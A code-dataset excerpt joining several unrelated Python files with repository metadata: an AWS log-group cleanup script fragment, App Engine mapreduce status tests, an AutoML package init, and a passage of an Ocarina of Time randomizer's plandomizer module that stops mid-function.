with open('loglist.json', 'w') as outfile:
json.dump(loglist, outfile, ensure_ascii=False, indent=4,
sort_keys=True)
#Opens file and searches through to find given loggroup name
with open("loglist.json") as f:
file_parsed = json.load(f)
for i in file_parsed['logGroups']:
print(i['logGroupName'])
cwlogs.delete_log_group(
logGroupName=(i['logGroupName'])
)
| 22.68
| 61
| 0.696649
|
97afd65a824953c7976aff894c098225994792a4
| 20,582
|
py
|
Python
|
python/test/mapreduce/status_test.py
|
Khan/appengine-mapreduce-1
|
7afdd4f6ae523c55a12273dec6649d7f71ce2379
|
[
"Apache-2.0"
] | null | null | null |
python/test/mapreduce/status_test.py
|
Khan/appengine-mapreduce-1
|
7afdd4f6ae523c55a12273dec6649d7f71ce2379
|
[
"Apache-2.0"
] | null | null | null |
python/test/mapreduce/status_test.py
|
Khan/appengine-mapreduce-1
|
7afdd4f6ae523c55a12273dec6649d7f71ce2379
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
import tempfile
import time
import unittest
try:
import json
except ImportError:
import simplejson as json
from google.appengine.api import yaml_errors
from google.appengine.ext import db
from mapreduce import errors
from mapreduce import handlers
from mapreduce import status
from testlib import testutil
from mapreduce import test_support
from google.appengine.ext.webapp import mock_webapp
class TestKind(db.Model):
"""Used for testing."""
foobar = db.StringProperty(default="meep")
def TestMap(entity):
"""Used for testing."""
pass
class MapreduceYamlTest(unittest.TestCase):
"""Testing mapreduce.yaml-related functionality."""
def set_up_directory_tree(self, dir_tree_contents):
"""Create directory tree from dict of path:contents entries."""
for full_path, contents in dir_tree_contents.iteritems():
dir_name = os.path.dirname(full_path)
if not os.path.isdir(dir_name):
os.makedirs(dir_name)
f = open(full_path, 'w')
f.write(contents)
f.close()
def setUp(self):
"""Initialize temporary application variable."""
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
"""Remove temporary application directory."""
if self.tempdir:
shutil.rmtree(self.tempdir)
def testFindYamlFile(self):
"""Test if mapreduce.yaml can be found with different app/library trees."""
test_status = os.path.join(self.tempdir, "library_root", "google",
"appengine", "ext", "mapreduce", "status.py")
test_mapreduce_yaml = os.path.join(self.tempdir, "application_root",
"mapreduce.yaml")
test_dict = {
test_status: "test",
test_mapreduce_yaml: "test",
}
self.set_up_directory_tree(test_dict)
os.chdir(os.path.dirname(test_mapreduce_yaml))
yaml_loc = status.find_mapreduce_yaml(status_file=test_status)
self.assertEqual(test_mapreduce_yaml, yaml_loc)
def testFindYamlFileSameTree(self):
"""Test if mapreduce.yaml can be found with the same app/library tree."""
test_status = os.path.join(self.tempdir, "application_root", "google",
"appengine", "ext", "mapreduce", "status.py")
test_mapreduce_yaml = os.path.join(self.tempdir, "application_root",
"mapreduce.yaml")
test_dict = {
test_status: "test",
test_mapreduce_yaml: "test",
}
self.set_up_directory_tree(test_dict)
os.chdir(os.path.dirname(test_mapreduce_yaml))
yaml_loc = status.find_mapreduce_yaml(status_file=test_status)
self.assertEqual(test_mapreduce_yaml, yaml_loc)
def testParseEmptyFile(self):
"""Parsing empty mapreduce.yaml file."""
self.assertRaises(errors.BadYamlError,
status.parse_mapreduce_yaml,
"")
def testParse(self):
"""Parsing a single document in mapreduce.yaml."""
mr_yaml = status.parse_mapreduce_yaml(
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
" params_validator: Validator1\n"
" params:\n"
" - name: entity_kind\n"
" default: Kind1\n"
" - name: human_supplied1\n"
" - name: human_supplied2\n"
"- name: Mapreduce2\n"
" mapper:\n"
" handler: Handler2\n"
" input_reader: Reader2\n")
self.assertTrue(mr_yaml)
self.assertEquals(2, len(mr_yaml.mapreduce))
self.assertEquals("Mapreduce1", mr_yaml.mapreduce[0].name)
self.assertEquals("Handler1", mr_yaml.mapreduce[0].mapper.handler)
self.assertEquals("Reader1", mr_yaml.mapreduce[0].mapper.input_reader)
self.assertEquals("Validator1",
mr_yaml.mapreduce[0].mapper.params_validator)
self.assertEquals(3, len(mr_yaml.mapreduce[0].mapper.params))
self.assertEquals("entity_kind", mr_yaml.mapreduce[0].mapper.params[0].name)
self.assertEquals("Kind1", mr_yaml.mapreduce[0].mapper.params[0].default)
self.assertEquals("human_supplied1",
mr_yaml.mapreduce[0].mapper.params[1].name)
self.assertEquals("human_supplied2",
mr_yaml.mapreduce[0].mapper.params[2].name)
self.assertEquals("Mapreduce2", mr_yaml.mapreduce[1].name)
self.assertEquals("Handler2", mr_yaml.mapreduce[1].mapper.handler)
self.assertEquals("Reader2", mr_yaml.mapreduce[1].mapper.input_reader)
def testParseOutputWriter(self):
"""Parsing a single document in mapreduce.yaml with output writer."""
mr_yaml = status.parse_mapreduce_yaml(
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
" output_writer: Writer1\n"
)
self.assertTrue(mr_yaml)
self.assertEquals(1, len(mr_yaml.mapreduce))
self.assertEquals("Mapreduce1", mr_yaml.mapreduce[0].name)
self.assertEquals("Handler1", mr_yaml.mapreduce[0].mapper.handler)
self.assertEquals("Reader1", mr_yaml.mapreduce[0].mapper.input_reader)
self.assertEquals("Writer1", mr_yaml.mapreduce[0].mapper.output_writer)
def testParseMissingRequiredAttrs(self):
"""Test parsing with missing required attributes."""
self.assertRaises(errors.BadYamlError,
status.parse_mapreduce_yaml,
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n")
self.assertRaises(errors.BadYamlError,
status.parse_mapreduce_yaml,
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" input_reader: Reader1\n")
def testBadValues(self):
"""Tests when some yaml values are of the wrong type."""
self.assertRaises(errors.BadYamlError,
status.parse_mapreduce_yaml,
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
" params:\n"
" - name: $$Invalid$$\n")
def testMultipleDocuments(self):
"""Tests when multiple documents are present."""
self.assertRaises(errors.BadYamlError,
status.parse_mapreduce_yaml,
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
"---")
def testOverlappingNames(self):
"""Tests when there are jobs with the same name."""
self.assertRaises(errors.BadYamlError,
status.parse_mapreduce_yaml,
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n")
def testToDict(self):
"""Tests encoding the MR document as JSON."""
mr_yaml = status.parse_mapreduce_yaml(
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
" params_validator: Validator1\n"
" params:\n"
" - name: entity_kind\n"
" default: Kind1\n"
" - name: human_supplied1\n"
" - name: human_supplied2\n"
"- name: Mapreduce2\n"
" mapper:\n"
" handler: Handler2\n"
" input_reader: Reader2\n")
all_configs = status.MapReduceYaml.to_dict(mr_yaml)
self.assertEquals(
[
{
'name': 'Mapreduce1',
'mapper_params_validator': 'Validator1',
'mapper_params': {
'entity_kind': 'Kind1',
'human_supplied2': None,
'human_supplied1': None},
'mapper_handler': 'Handler1',
'mapper_input_reader': 'Reader1'
},
{
'mapper_input_reader': 'Reader2',
'mapper_handler': 'Handler2',
'name': 'Mapreduce2'
}
], all_configs)
def testToDictOutputWriter(self):
"""Tests encoding the MR document with output writer as JSON."""
mr_yaml = status.parse_mapreduce_yaml(
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
" output_writer: Writer1\n"
)
all_configs = status.MapReduceYaml.to_dict(mr_yaml)
self.assertEquals(
[
{
'name': 'Mapreduce1',
'mapper_handler': 'Handler1',
'mapper_input_reader': 'Reader1',
'mapper_output_writer': 'Writer1',
},
], all_configs)
class ResourceTest(testutil.HandlerTestBase):
"""Tests for the resource handler."""
def setUp(self):
"""Sets up the test harness."""
testutil.HandlerTestBase.setUp(self)
self.handler = status.ResourceHandler()
self.handler.initialize(mock_webapp.MockRequest(),
mock_webapp.MockResponse())
self.handler.request.path = "/mapreduce/path"
def testPaths(self):
"""Tests that paths are accessible."""
self.handler.get("status")
self.assertTrue(self.handler.response.out.getvalue().startswith(
"<!DOCTYPE html>"))
self.assertEquals("text/html",
self.handler.response.headers["Content-Type"])
self.handler.response.out.truncate(0)
self.handler.get("jquery.js")
self.assertTrue(self.handler.response.out.getvalue().startswith(
"/*!"))
self.assertEquals("text/javascript",
self.handler.response.headers["Content-Type"])
def testCachingHeaders(self):
"""Tests that caching headers are correct."""
self.handler.get("status")
self.assertEquals("public; max-age=300",
self.handler.response.headers["Cache-Control"])
def testMissing(self):
"""Tests when a resource is requested that doesn't exist."""
self.handler.get("unknown")
self.assertEquals(404, self.handler.response.status)
class ListConfigsTest(testutil.HandlerTestBase):
"""Tests for the ListConfigsHandler."""
def setUp(self):
"""Sets up the test harness."""
testutil.HandlerTestBase.setUp(self)
self.handler = status.ListConfigsHandler()
self.handler.initialize(mock_webapp.MockRequest(),
mock_webapp.MockResponse())
self.handler.request.path = "/mapreduce/command/path"
self.handler.request.headers["X-Requested-With"] = "XMLHttpRequest"
def testCSRF(self):
"""Test that we check the X-Requested-With header."""
del self.handler.request.headers["X-Requested-With"]
self.handler.get()
self.assertEquals(403, self.handler.response.status)
def testBasic(self):
"""Tests listing available configs."""
old_get_yaml = status.get_mapreduce_yaml
status.get_mapreduce_yaml = lambda: status.parse_mapreduce_yaml(
"mapreduce:\n"
"- name: Mapreduce1\n"
" mapper:\n"
" handler: Handler1\n"
" input_reader: Reader1\n"
" params_validator: Validator1\n"
" params:\n"
" - name: entity_kind\n"
" default: Kind1\n"
" - name: human_supplied1\n"
" - name: human_supplied2\n"
"- name: Mapreduce2\n"
" mapper:\n"
" handler: Handler2\n"
" input_reader: Reader2\n"
" params_validator: MapreduceValidator\n"
" params:\n"
" - name: foo\n"
" value: bar\n")
try:
self.handler.get()
finally:
status.get_mapreduce_yaml = old_get_yaml
self.assertEquals(
{u'configs': [
{u'mapper_params_validator': u'Validator1',
u'mapper_params': {
u'entity_kind': u'Kind1',
u'human_supplied2': None,
u'human_supplied1': None},
u'mapper_input_reader': u'Reader1',
u'mapper_handler': u'Handler1',
u'name': u'Mapreduce1'},
{u'mapper_input_reader': u'Reader2',
u'mapper_handler': u'Handler2',
u'name': u'Mapreduce2',
u'params': {
u'foo': u'bar',},
}]},
json.loads(self.handler.response.out.getvalue()))
self.assertEquals("text/javascript",
self.handler.response.headers["Content-Type"])
class ListJobsTest(testutil.HandlerTestBase):
"""Tests listing active and inactive jobs."""
def setUp(self):
"""Sets up the test harness."""
testutil.HandlerTestBase.setUp(self)
self.start = handlers.StartJobHandler()
self.start.initialize(mock_webapp.MockRequest(),
mock_webapp.MockResponse())
self.start.request.path = "/mapreduce/command/start"
self.start.request.set(
"mapper_input_reader",
"mapreduce.input_readers.DatastoreInputReader")
self.start.request.set("mapper_handler", "__main__.TestMap")
self.start.request.set("mapper_params.entity_kind", "__main__.TestKind")
self.start.request.headers["X-Requested-With"] = "XMLHttpRequest"
self.handler = status.ListJobsHandler()
self.handler.initialize(mock_webapp.MockRequest(),
mock_webapp.MockResponse())
self.handler.request.path = "/mapreduce/command/list"
self.handler.request.headers["X-Requested-With"] = "XMLHttpRequest"
def testCSRF(self):
"""Test that we check the X-Requested-With header."""
TestKind().put()
del self.start.request.headers["X-Requested-With"]
self.start.post()
self.assertEquals(403, self.start.response.status)
del self.handler.request.headers["X-Requested-With"]
self.handler.get()
self.assertEquals(403, self.handler.response.status)
def testBasic(self):
"""Tests when there are fewer than the max results to render."""
TestKind().put()
self.start.request.set("name", "my job 1")
self.start.post()
time.sleep(.1)
self.start.request.set("name", "my job 2")
self.start.post()
time.sleep(.1)
self.start.request.set("name", "my job 3")
self.start.post()
self.handler.get()
result = json.loads(self.handler.response.out.getvalue())
expected_args = set([
"active",
"active_shards",
"chart_url",
"chart_width",
"mapreduce_id",
"name",
"shards",
"start_timestamp_ms",
"updated_timestamp_ms",
])
self.assertEquals(3, len(result["jobs"]))
self.assertEquals("my job 3", result["jobs"][0]["name"])
self.assertEquals("my job 2", result["jobs"][1]["name"])
self.assertEquals("my job 1", result["jobs"][2]["name"])
self.assertEquals(expected_args, set(result["jobs"][0].keys()))
self.assertEquals(expected_args, set(result["jobs"][1].keys()))
self.assertEquals(expected_args, set(result["jobs"][2].keys()))
def testCursor(self):
"""Tests when a job cursor is present."""
TestKind().put()
self.start.request.set("name", "my job 1")
self.start.post()
time.sleep(.1) # Can not start two jobs before time advances
self.start.request.set("name", "my job 2")
self.start.post()
self.handler.request.set("count", "1")
self.handler.get()
result = json.loads(self.handler.response.out.getvalue())
self.assertEquals(1, len(result["jobs"]))
self.assertTrue("cursor" in result)
self.handler.response.out.truncate(0)
self.handler.request.set("count", "1")
self.handler.request.set("cursor", result['cursor'])
self.handler.get()
result2 = json.loads(self.handler.response.out.getvalue())
self.assertEquals(1, len(result2["jobs"]))
self.assertFalse("cursor" in result2)
def testNoJobs(self):
"""Tests when there are no jobs."""
self.handler.get()
result = json.loads(self.handler.response.out.getvalue())
self.assertEquals({'jobs': []}, result)
class GetJobDetailTest(testutil.HandlerTestBase):
"""Tests listing job status detail."""
def setUp(self):
"""Sets up the test harness."""
testutil.HandlerTestBase.setUp(self)
for _ in range(100):
TestKind().put()
self.start = handlers.StartJobHandler()
self.start.initialize(mock_webapp.MockRequest(),
mock_webapp.MockResponse())
self.start.request.path = "/mapreduce/command/start"
self.start.request.set("name", "my job 1")
self.start.request.set(
"mapper_input_reader",
"mapreduce.input_readers.DatastoreInputReader")
self.start.request.set("mapper_handler", "__main__.TestMap")
self.start.request.set("mapper_params.entity_kind", "__main__.TestKind")
self.start.request.headers["X-Requested-With"] = "XMLHttpRequest"
self.start.post()
result = json.loads(self.start.response.out.getvalue())
self.mapreduce_id = result["mapreduce_id"]
self.handler = status.GetJobDetailHandler()
self.handler.initialize(mock_webapp.MockRequest(),
mock_webapp.MockResponse())
self.handler.request.path = "/mapreduce/command/list"
self.handler.request.headers["X-Requested-With"] = "XMLHttpRequest"
def KickOffMapreduce(self):
"""Executes pending kickoff task."""
test_support.execute_all_tasks(self.taskqueue)
def testCSRF(self):
"""Test that we check the X-Requested-With header."""
del self.handler.request.headers["X-Requested-With"]
self.handler.get()
self.assertEquals(403, self.handler.response.status)
def testBasic(self):
"""Tests getting the job details."""
self.KickOffMapreduce()
self.handler.request.set("mapreduce_id", self.mapreduce_id)
self.handler.get()
result = json.loads(self.handler.response.out.getvalue())
expected_keys = set([
"active", "chart_url", "counters", "mapper_spec", "mapreduce_id",
"name", "result_status", "shards", "start_timestamp_ms",
"updated_timestamp_ms", "params", "hooks_class_name", "chart_width"])
expected_shard_keys = set([
"active", "counters", "last_work_item", "result_status",
"shard_description", "shard_id", "shard_number",
"updated_timestamp_ms"])
self.assertEquals(expected_keys, set(result.keys()))
self.assertEquals(8, len(result["shards"]))
self.assertEquals(expected_shard_keys, set(result["shards"][0].keys()))
def testBeforeKickOff(self):
"""Tests getting the job details."""
self.handler.request.set("mapreduce_id", self.mapreduce_id)
self.handler.get()
result = json.loads(self.handler.response.out.getvalue())
expected_keys = set([
"active", "chart_url", "counters", "mapper_spec", "mapreduce_id",
"name", "result_status", "shards", "start_timestamp_ms",
"updated_timestamp_ms", "params", "hooks_class_name", "chart_width"])
self.assertEquals(expected_keys, set(result.keys()))
def testBadJobId(self):
"""Tests when an invalid job ID is supplied."""
self.handler.request.set("mapreduce_id", "does not exist")
self.handler.get()
result = json.loads(self.handler.response.out.getvalue())
self.assertEquals(
{"error_message": "\"Could not find job with ID 'does not exist'\"",
"error_class": "KeyError"},
result)
# TODO(user): Add tests for abort
# TODO(user): Add tests for cleanup
if __name__ == "__main__":
unittest.main()
| 35.794783
| 80
| 0.620396
|
abe1adb6164e2536c240dd2fa3311cb720f14fe2
| 371
|
py
|
Python
|
diego/classifier/__init__.py
|
lai-bluejay/diego-automl
|
84e8255cf372be43ae9ca9a4586faadc4d5750a2
|
[
"MIT"
] | 7
|
2019-03-22T14:56:06.000Z
|
2021-02-02T02:19:19.000Z
|
diego/classifier/__init__.py
|
lai-bluejay/diego-automl
|
84e8255cf372be43ae9ca9a4586faadc4d5750a2
|
[
"MIT"
] | 1
|
2019-05-30T03:34:18.000Z
|
2019-06-20T13:47:08.000Z
|
diego/classifier/__init__.py
|
lai-bluejay/diego-automl
|
84e8255cf372be43ae9ca9a4586faadc4d5750a2
|
[
"MIT"
] | 2
|
2020-04-17T14:11:59.000Z
|
2021-02-02T02:19:28.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
classifier/__init__.py was created on 2019/04/25.
file in :relativeFile
Author: Charles_Lai
Email: lai.bluejay@gmail.com
"""
from diego.classifier.base import DiegoClassifier
from diego.classifier.logistic_regression import LogisticRegressionSMAC
from diego.classifier.logistic_regression_sk import LogisticRegressionSK
| 30.916667
| 72
| 0.808625
|
a91999d5a65a7349dc79e5e98f0fe295bfa31eb7
| 37,812
|
py
|
Python
|
Plandomizer.py
|
maedas/OoTR-BQ
|
ef98b0d84b3fb7364af45a31c98e6b271c365f5c
|
[
"MIT"
] | null | null | null |
Plandomizer.py
|
maedas/OoTR-BQ
|
ef98b0d84b3fb7364af45a31c98e6b271c365f5c
|
[
"MIT"
] | 2
|
2019-12-04T12:58:13.000Z
|
2019-12-04T13:01:30.000Z
|
Plandomizer.py
|
maedas/OoTR-BQ
|
ef98b0d84b3fb7364af45a31c98e6b271c365f5c
|
[
"MIT"
] | null | null | null |
import itertools
import json
import logging
import re
import random
from functools import reduce
from Fill import FillError
from EntranceShuffle import EntranceShuffleError, change_connections, confirm_replacement, validate_world, check_entrances_compatibility
from Hints import gossipLocations, GossipText
from Item import ItemFactory, ItemIterator, IsItem
from ItemPool import item_groups, get_junk_item
from Location import LocationIterator, LocationFactory, IsLocation
from LocationList import location_groups
from Playthrough import Playthrough
from Spoiler import HASH_ICONS
from version import __version__
from Utils import random_choices
from JSONDump import dump_obj, CollapseList, CollapseDict, AllignedDict, SortedDict
class InvalidFileException(Exception):
pass
per_world_keys = (
'randomized_settings',
'starting_items',
'item_pool',
'dungeons',
'trials',
'entrances',
'locations',
':woth_locations',
':barren_regions',
'gossip_stones',
)
search_groups = {
**location_groups,
**item_groups,
}
def SimpleRecord(props):
class Record(object):
def __init__(self, src_dict=None):
self.update(src_dict, update_all=True)
def update(self, src_dict, update_all=False):
if src_dict is None:
src_dict = {}
for k, p in props.items():
if update_all or k in src_dict:
setattr(self, k, src_dict.get(k, p))
def to_json(self):
return {k: getattr(self, k) for (k, d) in props.items() if getattr(self, k) != d}
def __str__(self):
return dump_obj(self.to_json())
return Record
class DungeonRecord(SimpleRecord({'mq': None})):
def __init__(self, src_dict='random'):
if src_dict == 'random':
src_dict = {'mq': None}
if src_dict == 'mq':
src_dict = {'mq': True}
if src_dict == 'vanilla':
src_dict = {'mq': False}
super().__init__(src_dict)
def to_json(self):
if self.mq is None:
return 'random'
return 'mq' if self.mq else 'vanilla'
class GossipRecord(SimpleRecord({'text': None, 'colors': None})):
def to_json(self):
if self.colors is not None:
self.colors = CollapseList(self.colors)
return CollapseDict(super().to_json())
class ItemPoolRecord(SimpleRecord({'type': 'set', 'count': 1})):
def __init__(self, src_dict=1):
if isinstance(src_dict, int):
src_dict = {'count':src_dict}
super().__init__(src_dict)
def to_json(self):
if self.type == 'set':
return self.count
else:
return CollapseDict(super().to_json())
def update(self, src_dict, update_all=False):
super().update(src_dict, update_all)
if self.count < 0:
raise ValueError("Count cannot be negative in a ItemPoolRecord.")
if self.type not in ['add', 'remove', 'set']:
raise ValueError("Type must be 'add', 'remove', or 'set' in a ItemPoolRecord.")
class LocationRecord(SimpleRecord({'item': None, 'player': None, 'price': None, 'model': None})):
def __init__(self, src_dict):
if isinstance(src_dict, str):
src_dict = {'item':src_dict}
super().__init__(src_dict)
def to_json(self):
self_dict = super().to_json()
if list(self_dict.keys()) == ['item']:
return str(self.item)
else:
return CollapseDict(self_dict)
@staticmethod
def from_item(item):
if item.world.settings.world_count > 1:
player = item.world.id + 1
else:
player = None if item.location is not None and item.world is item.location.world else (item.world.id + 1)
return LocationRecord({
'item': item.name,
'player': player,
'model': item.looks_like_item.name if item.looks_like_item is not None and item.location.has_preview() and can_cloak(item, item.looks_like_item) else None,
'price': item.location.price,
})
class EntranceRecord(SimpleRecord({'region': None, 'origin': None})):
def __init__(self, src_dict):
if isinstance(src_dict, str):
src_dict = {'region':src_dict}
if 'from' in src_dict:
src_dict['origin'] = src_dict['from']
del src_dict['from']
super().__init__(src_dict)
def to_json(self):
self_dict = super().to_json()
if list(self_dict.keys()) == ['region']:
return str(self.region)
else:
self_dict['from'] = self_dict['origin']
del self_dict['origin']
return CollapseDict(self_dict)
@staticmethod
def from_entrance(entrance):
if entrance.replaces.primary and entrance.replaces.type in ('Interior', 'SpecialInterior', 'Grotto', 'Grave'):
origin_name = None
else:
origin_name = entrance.replaces.parent_region.name
return EntranceRecord({
'region': entrance.connected_region.name,
'origin': origin_name,
})
class StarterRecord(SimpleRecord({'count': 1})):
def __init__(self, src_dict=1):
if isinstance(src_dict, int):
src_dict = {'count': src_dict}
super().__init__(src_dict)
def to_json(self):
return self.count
class TrialRecord(SimpleRecord({'active': None})):
def __init__(self, src_dict='random'):
if src_dict == 'random':
src_dict = {'active': None}
if src_dict == 'active':
src_dict = {'active': True}
if src_dict == 'inactive':
src_dict = {'active': False}
super().__init__(src_dict)
def to_json(self):
if self.active is None:
return 'random'
return 'active' if self.active else 'inactive'
class WorldDistribution(object):
def __init__(self, distribution, id, src_dict={}):
self.distribution = distribution
self.id = id
self.base_pool = []
self.song_as_items = False
self.update(src_dict, update_all=True)
def update(self, src_dict, update_all=False):
update_dict = {
'randomized_settings': {name: record for (name, record) in src_dict.get('randomized_settings', {}).items()},
'dungeons': {name: DungeonRecord(record) for (name, record) in src_dict.get('dungeons', {}).items()},
'trials': {name: TrialRecord(record) for (name, record) in src_dict.get('trials', {}).items()},
'item_pool': {name: ItemPoolRecord(record) for (name, record) in src_dict.get('item_pool', {}).items()},
'starting_items': {name: StarterRecord(record) for (name, record) in src_dict.get('starting_items', {}).items()},
'entrances': {name: EntranceRecord(record) for (name, record) in src_dict.get('entrances', {}).items()},
'locations': {name: [LocationRecord(rec) for rec in record] if is_pattern(name) else LocationRecord(record) for (name, record) in src_dict.get('locations', {}).items() if not is_output_only(name)},
'woth_locations': None,
'barren_regions': None,
'gossip_stones': {name: [GossipRecord(rec) for rec in record] if is_pattern(name) else GossipRecord(record) for (name, record) in src_dict.get('gossip_stones', {}).items()},
}
if update_all:
self.__dict__.update(update_dict)
else:
for k in src_dict:
if k in update_dict:
value = update_dict[k]
if self.__dict__.get(k, None) is None:
setattr(self, k, value)
elif isinstance(value, dict):
getattr(self, k).update(value)
elif isinstance(value, list):
getattr(self, k).extend(value)
else:
setattr(self, k, None)
def to_json(self):
return {
'randomized_settings': self.randomized_settings,
'starting_items': SortedDict({name: record.to_json() for (name, record) in self.starting_items.items()}),
'dungeons': {name: record.to_json() for (name, record) in self.dungeons.items()},
'trials': {name: record.to_json() for (name, record) in self.trials.items()},
'item_pool': SortedDict({name: record.to_json() for (name, record) in self.item_pool.items()}),
'entrances': {name: record.to_json() for (name, record) in self.entrances.items()},
'locations': {name: [rec.to_json() for rec in record] if is_pattern(name) else record.to_json() for (name, record) in self.locations.items()},
':woth_locations': None if self.woth_locations is None else {name: record.to_json() for (name, record) in self.woth_locations.items()},
':barren_regions': self.barren_regions,
'gossip_stones': SortedDict({name: [rec.to_json() for rec in record] if is_pattern(name) else record.to_json() for (name, record) in self.gossip_stones.items()}),
}
def __str__(self):
return dump_obj(self.to_json())
# adds the location entry only if there is no record for that location already
def add_location(self, new_location, new_item):
for (location, record) in self.locations.items():
pattern = pattern_matcher(location)
if pattern(new_location):
raise KeyError('Cannot add location that already exists')
self.locations[new_location] = LocationRecord(new_item)
def configure_dungeons(self, world, dungeon_pool):
dist_num_mq = 0
for (name, record) in self.dungeons.items():
if record.mq is not None:
dungeon_pool.remove(name)
if record.mq:
dist_num_mq += 1
world.dungeon_mq[name] = True
return dist_num_mq
def configure_trials(self, trial_pool):
dist_chosen = []
for (name, record) in self.trials.items():
if record.active is not None:
trial_pool.remove(name)
if record.active:
dist_chosen.append(name)
return dist_chosen
def configure_randomized_settings(self, world):
for name, record in self.randomized_settings.items():
setattr(world, name, record)
if name not in world.randomized_list:
world.randomized_list.append(name)
def configure_stating_items_settings(self, world):
if world.start_with_wallet:
self.give_item('Progressive Wallet', 3)
if world.start_with_rupees:
self.give_item('Rupees', 999)
if world.start_with_deku_equipment:
if world.shopsanity == "off":
self.give_item('Deku Shield')
self.give_item('Deku Sticks', 99)
self.give_item('Deku Nuts', 99)
if world.start_with_fast_travel:
self.give_item('Prelude of Light')
self.give_item('Serenade of Water')
self.give_item('Farores Wind')
def pool_remove_item(self, pools, item_name, count, world_id=None, use_base_pool=True):
removed_items = []
base_remove_matcher = pattern_matcher(item_name)
remove_matcher = lambda item: base_remove_matcher(item) and ((item in self.base_pool) ^ (not use_base_pool))
if world_id is None:
predicate = remove_matcher
else:
predicate = lambda item: item.world.id == world_id and remove_matcher(item.name)
for i in range(count):
removed_item = pull_random_element(pools, predicate)
if removed_item is None:
if not use_base_pool:
if IsItem(item_name):
raise KeyError('No remaining items matching "%s" to be removed.' % (item_name))
else:
raise KeyError('No items matching "%s"' % (item_name))
else:
removed_items.extend(self.pool_remove_item(pools, item_name, count - i, world_id=world_id, use_base_pool=False))
break
if use_base_pool:
if world_id is None:
self.base_pool.remove(removed_item)
else:
self.base_pool.remove(removed_item.name)
removed_items.append(removed_item)
return removed_items
def pool_add_item(self, pool, item_name, count):
added_items = []
if item_name == '#Junk':
added_items = get_junk_item(count)
elif is_pattern(item_name):
add_matcher = lambda item: pattern_matcher(item_name)(item.name)
candidates = [item.name for item in ItemIterator(predicate=add_matcher)]
if len(candidates) == 0:
raise RuntimeError("Unknown item could not be added: " + item_name)
added_items = random_choices(candidates, k=count)
else:
if not IsItem(item_name):
raise RuntimeError("Unknown item could not be added: " + item_name)
added_items = [item_name] * count
for item in added_items:
pool.append(item)
return added_items
def alter_pool(self, world, pool):
self.base_pool = list(pool)
pool_size = len(pool)
bottle_matcher = pattern_matcher("#Bottle")
trade_matcher = pattern_matcher("#AdultTrade")
for item_name, record in self.item_pool.items():
if record.type == 'add':
self.pool_add_item(pool, item_name, record.count)
if record.type == 'remove':
self.pool_remove_item([pool], item_name, record.count)
for item_name, record in self.item_pool.items():
if record.type == 'set':
if item_name == '#Junk':
raise ValueError('#Junk item group cannot have a set number of items')
predicate = pattern_matcher(item_name)
pool_match = [item for item in pool if predicate(item)]
for item in pool_match:
self.base_pool.remove(item)
add_count = record.count - len(pool_match)
if add_count > 0:
added_items = self.pool_add_item(pool, item_name, add_count)
for item in added_items:
if bottle_matcher(item):
self.pool_remove_item([pool], "#Bottle", 1)
elif trade_matcher(item):
self.pool_remove_item([pool], "#AdultTrade", 1)
else:
removed_items = self.pool_remove_item([pool], item_name, -add_count)
for item in removed_items:
if bottle_matcher(item):
self.pool_add_item(pool, "#Bottle", 1)
elif trade_matcher(item):
self.pool_add_item(pool, "#AdultTrade", 1)
junk_to_add = pool_size - len(pool)
if junk_to_add > 0:
junk_items = self.pool_add_item(pool, "#Junk", junk_to_add)
else:
junk_items = self.pool_remove_item([pool], "#Junk", -junk_to_add)
return pool
def set_complete_itempool(self, pool):
self.item_pool = {}
for item in pool:
if item.dungeonitem or item.type in ('Drop', 'Event', 'DungeonReward'):
continue
if item.name in self.item_pool:
self.item_pool[item.name].count += 1
else:
self.item_pool[item.name] = ItemPoolRecord()
def collect_starters(self, state):
for (name, record) in self.starting_items.items():
for _ in range(record.count):
try:
item = ItemFactory("Bottle" if name == "Bottle with Milk (Half)" else name)
except KeyError:
continue
state.collect(item)
def set_shuffled_entrances(self, worlds, entrance_pools, target_entrance_pools, locations_to_ensure_reachable, itempool):
for (name, record) in self.entrances.items():
if record.region is None:
continue
if not worlds[self.id].get_entrance(name):
raise RuntimeError('Unknown entrance in world %d: %s' % (self.id + 1, name))
entrance_found = False
for pool_type, entrance_pool in entrance_pools.items():
try:
matched_entrance = next(filter(lambda entrance: entrance.name == name, entrance_pool))
except StopIteration:
continue
entrance_found = True
if matched_entrance.connected_region != None:
if matched_entrance.type == 'Overworld':
continue
else:
raise RuntimeError('Entrance already shuffled in world %d: %s' % (self.id + 1, name))
target_region = record.region
matched_targets_to_region = list(filter(lambda target: target.connected_region and target.connected_region.name == target_region,
target_entrance_pools[pool_type]))
if not matched_targets_to_region:
raise RuntimeError('No entrance found to replace with %s that leads to %s in world %d' %
(matched_entrance, target_region, self.id + 1))
if record.origin:
target_parent = record.origin
try:
matched_target = next(filter(lambda target: target.replaces.parent_region.name == target_parent, matched_targets_to_region))
except StopIteration:
raise RuntimeError('No entrance found to replace with %s that leads to %s from %s in world %d' %
(matched_entrance, target_region, target_parent, self.id + 1))
else:
matched_target = matched_targets_to_region[0]
